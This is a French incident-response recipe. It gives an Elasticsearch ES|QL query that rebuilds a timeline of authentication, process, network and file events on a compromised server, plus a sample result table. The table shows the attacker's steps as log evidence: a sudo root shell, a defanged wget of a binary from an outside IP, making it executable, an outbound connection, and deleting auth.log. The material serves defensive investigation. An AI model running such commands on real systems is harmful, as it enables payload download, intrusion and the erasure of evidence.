Timeline de triage d'un hôte compromis
Reconstruction chronologique multi-catégories (auth, process, réseau, fichiers) sur une fenêtre d'incident, avec un champ detail unifié via COALESCE pour lire l'attaque de bout en bout.
Cas d'usage
Première heure d'une investigation : dérouler la séquence exacte des actions sur la machine touchée.
Prérequis
Elasticsearch 8.12+, logs ECS multi-sources
SQL
FROM "logs-*"
| WHERE host.name == "srv-app-02"
AND @timestamp >= "2026-06-10T02:00:00Z"
AND @timestamp < "2026-06-10T04:30:00Z"
AND event.category IN ("authentication", "process", "network", "file")
| EVAL detail = COALESCE(
process.command_line,
file.path,
CONCAT(destination.ip, ":", TO_STRING(destination.port)),
event.action)
| KEEP @timestamp, event.category, event.action, user.name, detail
| SORT @timestamp ASC
| LIMIT 200Résultat
@timestamp | event.category | event.action | user.name | detail -------------------------+----------------+-----------------+-----------+---------------------------------------- 2026-06-10T02:07:14.220Z | authentication | ssh-login | deploy | ssh-login 2026-06-10T02:08:02.114Z | process | exec | deploy | sudo su - 2026-06-10T02:09:41.872Z | process | exec | root | wget hxxp://198.51.100.23/agent.bin 2026-06-10T02:09:58.330Z | file | creation | root | /tmp/.cache/agent.bin 2026-06-10T02:10:03.001Z | process | exec | root | chmod +x /tmp/.cache/agent.bin 2026-06-10T02:10:11.448Z | network | connection | root | 198.51.100.23:443 2026-06-10T02:41:09.112Z | file | deletion | root | /var/log/auth.log 2026-06-10T03:55:37.604Z | network | connection | root | 10.2.0.14:5432
SOCInvestigationTimelineTriage